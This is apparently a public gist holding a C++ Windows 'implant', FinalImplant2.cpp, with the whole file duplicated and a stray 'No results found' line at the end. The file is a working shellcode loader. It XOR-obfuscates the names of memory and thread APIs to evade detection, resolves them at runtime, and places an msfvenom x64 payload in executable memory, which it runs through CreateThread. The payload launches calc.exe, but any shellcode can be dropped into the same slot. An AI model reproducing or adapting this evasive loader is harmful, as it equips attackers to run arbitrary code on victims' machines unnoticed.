trevorsaudi/FinalImplant2.cpp

## FinalImplant2.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


void XOR(char * data, size_t data_len, char * key, size_t key_len) {
	int j;

	j = 0;
	for (int i = 0; i < data_len; i++) {
		if (j == key_len - 1) j = 0;

		data[i] = data[i] ^ key[j];
		j++;
	}
}

int main(void) {
    HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
    HMODULE hNtdll = GetModuleHandle("ntdll.dll");
    DWORD oldprotect;


    // Function pointers typedefs
    typedef LPVOID (WINAPI *VirtualAlloc_t)(
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect
    );

    typedef void (WINAPI *RtlMoveMemory_t)(
        LPVOID Destination,
        const void* Source,
        SIZE_T Length
    );

    typedef BOOL (WINAPI *VirtualProtect_t)(
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect
    );

    typedef HANDLE (WINAPI *CreateThread_t)(
        LPSECURITY_ATTRIBUTES   lpThreadAttributes,
        SIZE_T                  dwStackSize,
        LPTHREAD_START_ROUTINE  lpStartAddress,
        LPVOID                  lpParameter,
        DWORD                   dwCreationFlags,
        LPDWORD                 lpThreadId
    );


    char key[] = "hellohackers";
    char sVirtualAlloc[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x22,0x07,0x09,0x1d,0x10,0x00 };
    char sRtlMoveMemory[] = {0x3a,0x11,0x00,0x21,0x00,0x1e,0x04,0x2e,0x0e,0x08,0x1d,0x01,0x11,0x00 };
    char sVirtualProtect[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x33,0x19,0x0a,0x06,0x16,0x0b,0x11,0x00 };
    char sCreateThread[] = {0x2b,0x17,0x09,0x0d,0x1b,0x0d,0x35,0x0b,0x19,0x00,0x13,0x17,0x00 };


    XOR((char *) sVirtualAlloc, sizeof(sVirtualAlloc) - 1, key, sizeof(key));
    XOR((char *) sRtlMoveMemory, sizeof(sRtlMoveMemory) -1, key, sizeof(key));
    XOR((char *) sVirtualProtect, sizeof(sVirtualProtect) -1, key, sizeof(key));
    XOR((char *) sCreateThread, sizeof(sCreateThread) - 1, key, sizeof(key));

	// Resolve functions and their modules

    VirtualAlloc_t   pVirtualAlloc   = (VirtualAlloc_t)GetProcAddress(hKernel32, sVirtualAlloc);
    RtlMoveMemory_t  pRtlMoveMemory  = (RtlMoveMemory_t)GetProcAddress(hNtdll, sRtlMoveMemory);
    VirtualProtect_t pVirtualProtect = (VirtualProtect_t)GetProcAddress(hKernel32, sVirtualProtect);
    CreateThread_t   pCreateThread   = (CreateThread_t)GetProcAddress(hKernel32, sCreateThread);


    // msfvenom -p windows/x64/exec CMD=calc.exe -f C
	unsigned char payload[] =
	"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
	"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
	"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
	"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
	"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
	"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
	"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
	"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
	"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
	"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
	"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
	"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
	"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
	"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
	"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
	"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
	"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
	"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
	"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    unsigned int payload_len = sizeof(payload);

    // Allocate memory, copy payload, set permissions, and execute
    void* exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    pRtlMoveMemory(exec_mem, payload, payload_len);
    BOOL rv = pVirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    if (rv != 0) {
        HANDLE th = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);
    }

    return 0;
}
	#include <windows.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>


	void XOR(char * data, size_t data_len, char * key, size_t key_len) {
	int j;

	j = 0;
	for (int i = 0; i < data_len; i++) {
	if (j == key_len - 1) j = 0;

	data[i] = data[i] ^ key[j];
	j++;
	}
	}

	int main(void) {
	HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
	HMODULE hNtdll = GetModuleHandle("ntdll.dll");
	DWORD oldprotect;



	// Function pointers typedefs
	typedef LPVOID (WINAPI *VirtualAlloc_t)(
	LPVOID lpAddress,
	SIZE_T dwSize,
	DWORD flAllocationType,
	DWORD flProtect
	);

	typedef void (WINAPI *RtlMoveMemory_t)(
	LPVOID Destination,
	const void* Source,
	SIZE_T Length
	);

	typedef BOOL (WINAPI *VirtualProtect_t)(
	LPVOID lpAddress,
	SIZE_T dwSize,
	DWORD flNewProtect,
	PDWORD lpflOldProtect
	);

	typedef HANDLE (WINAPI *CreateThread_t)(
	LPSECURITY_ATTRIBUTES lpThreadAttributes,
	SIZE_T dwStackSize,
	LPTHREAD_START_ROUTINE lpStartAddress,
	LPVOID lpParameter,
	DWORD dwCreationFlags,
	LPDWORD lpThreadId
	);


	char key[] = "hellohackers";
	char sVirtualAlloc[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x22,0x07,0x09,0x1d,0x10,0x00 };
	char sRtlMoveMemory[] = {0x3a,0x11,0x00,0x21,0x00,0x1e,0x04,0x2e,0x0e,0x08,0x1d,0x01,0x11,0x00 };
	char sVirtualProtect[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x33,0x19,0x0a,0x06,0x16,0x0b,0x11,0x00 };
	char sCreateThread[] = {0x2b,0x17,0x09,0x0d,0x1b,0x0d,0x35,0x0b,0x19,0x00,0x13,0x17,0x00 };


	XOR((char *) sVirtualAlloc, sizeof(sVirtualAlloc) - 1, key, sizeof(key));
	XOR((char *) sRtlMoveMemory, sizeof(sRtlMoveMemory) -1, key, sizeof(key));
	XOR((char *) sVirtualProtect, sizeof(sVirtualProtect) -1, key, sizeof(key));
	XOR((char *) sCreateThread, sizeof(sCreateThread) - 1, key, sizeof(key));

	// Resolve functions and their modules

	VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t)GetProcAddress(hKernel32, sVirtualAlloc);
	RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t)GetProcAddress(hNtdll, sRtlMoveMemory);
	VirtualProtect_t pVirtualProtect = (VirtualProtect_t)GetProcAddress(hKernel32, sVirtualProtect);
	CreateThread_t pCreateThread = (CreateThread_t)GetProcAddress(hKernel32, sCreateThread);


	// msfvenom -p windows/x64/exec CMD=calc.exe -f C
	unsigned char payload[] =
	"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
	"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
	"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
	"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
	"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
	"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
	"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
	"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
	"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
	"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
	"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
	"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
	"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
	"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
	"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
	"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
	"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
	"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
	"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

	unsigned int payload_len = sizeof(payload);

	// Allocate memory, copy payload, set permissions, and execute
	void* exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT \| MEM_RESERVE, PAGE_READWRITE);
	pRtlMoveMemory(exec_mem, payload, payload_len);
	BOOL rv = pVirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	if (rv != 0) {
	HANDLE th = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
	WaitForSingleObject(th, -1);
	}

	return 0;
	}
No results found